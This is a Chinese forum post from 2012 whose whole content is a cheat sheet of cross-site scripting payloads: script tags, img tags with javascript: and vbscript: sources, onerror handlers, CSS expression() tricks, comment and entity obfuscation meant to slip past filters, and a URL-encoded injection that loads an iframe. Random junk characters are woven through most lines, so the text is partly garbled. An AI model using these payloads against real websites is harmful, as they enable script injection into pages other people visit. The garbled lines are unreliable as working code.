<script>alert("跨站")</script> (最常用)
) T3 o g4 {3 _ ~; _" c6 |/ R<img scr=javascript:alert("跨站")></img>
A5 Z( x+ R2 u1 A9 ]: N<img scr="javascript: alert(/跨站/)></img>
/ E. D* t! p. e2 u<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
- j* w0 T/ i$ k/ h3 x<img scr="#" onerror=alert(/跨站/)></img>
4 @, u7 f; z& H& p0 O; m1 u<img scr="#" style="xss:expression(alert(/xss/));"></img>
N1 O) L* A% \<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)( ?* l: J1 M6 F G/ q0 j8 @ q4 X
<img src=vbscript:msgbox ("xss")></img>& {; f: {. ]! E, {7 G/ b% U& \
<style> input {left:expression (alert('xss'))}</style>
5 K1 ?) q1 l$ t. r<div style={left:expression (alert('xss'))}></div>$ \4 {' I) l8 I+ z
<div style={left:exp/* */ression (alert('xss'))}></div>
! O1 f+ }# w+ _0 i" l<div style={left:\0065\0078ression (alert('xss'))}></div>1 H6 v* D4 p" K7 f
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>' K4 D; U% p# Q4 D
unicode <div style="{left:expRessioN (alert('xss'))}">
3 {* t9 x+ U0 q
% G$ c% q& i$ ?. q' _"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["+ z$ ^$ j1 @ z8 L$ j
|
发表于 2012-9-15 14:09:13
收藏
支持
反对